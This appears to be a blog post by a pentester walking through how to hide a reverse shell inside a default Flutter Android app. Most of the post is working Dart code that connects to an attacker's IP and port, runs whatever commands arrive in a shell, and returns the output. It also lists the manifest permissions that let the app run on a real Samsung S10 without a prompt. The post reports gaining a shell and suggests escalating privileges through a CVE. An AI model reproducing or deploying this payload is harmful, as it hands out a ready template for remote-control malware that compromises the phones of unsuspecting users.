Open in app

Sign in

Write

Sign in

Reverse Shell in Android From App in Flutter

Diego Condori
3 min readDec 16, 2023

Those of us who have ever done a reverse shell by installing a malicious application on an Android phone with metasploit, either to experiment or troll, were trying to do it again on a Samsung S10 phone with Android 12 and it didn’t work, besides, when generating the exploit in metasploit implies that then at the time of execution on the victim device, it explicitly asks you for permissions, which is why I decided to do this but with flutter in this experiment I will use a Samsung S10 phone with Android 12, I will use the application for default that is generated in flutter and I will only focus on injecting the payload into the main function.

This code put into main function:

final String serverIp = '192.168.86.26'; // Your IP attacker
  final int serverPort = 443; // Port Attacker

  Socket.connect(serverIp, serverPort).then((socket) {
    print('Connection suscessful');

    // Listen data from server
    socket.listen(
      (data) {
        final command = String.fromCharCodes(data).trim();
        print('Command Received From Server: $command');

        // Reverse Shell
        Process.run(command, [], runInShell: true).then((result) {
          final output = result.stdout;
          socket.write(output);
        }).catchError((error) {
          socket.write('Error command: $error');
        });
      },
      onDone: () {
        print('Close connection with server.');
        socket.destroy();
      },
      onError: (error) {
        print('Error: $error');
        socket.destroy();
      },
    );
  }).catchError((error) {
    print('Error connect server: $error');
  });

At this point we can compile the apk and upload it to the phone, but it will not work, of course, if we try it on a virtual phone, yes, I tried it and in my experience it did work, but if we want it to work on this phone we will add the following permissions to it. AndroidManifest.xml:

<manifest xmlns:android="http://schemas.android.com/apk/res/android">

    <uses-permission android:name="android.permission.INTERNET" />

    <uses-permission android:name="android.permission.WAKE_LOCK" />

    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />

    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" />

    <uses-permission android:name="android.permission.ACCESS_WIFI_STATE" />


    <application.........

In this way we are going to run the application:

It does not ask us for permissions and let’s check our attacker terminal:

We gotcha…..

Now let’s run some commands:

With this I conclude this story, it was interesting to return to those times where one experimented with the famous metasploit, although I must emphasize that compared to past times, even though we have achieved a Reverse Shell, it is more difficult to find certain information since we are limited. Unless we can escalate privileges, possibly through a CVE, if necessary, we could have total control, but in this case it is not, I have already tried using Termux to perform some information filtering and it is usually limited.

Android
Exploit
Malware

--

--

Diego Condori

Written by Diego Condori

19 Followers

eJPT | eCPPT | Pentester Red Team | Computer Science Student | Programmer

Help

Status

About

Careers

Blog

Privacy

Terms

Text to speech

Teams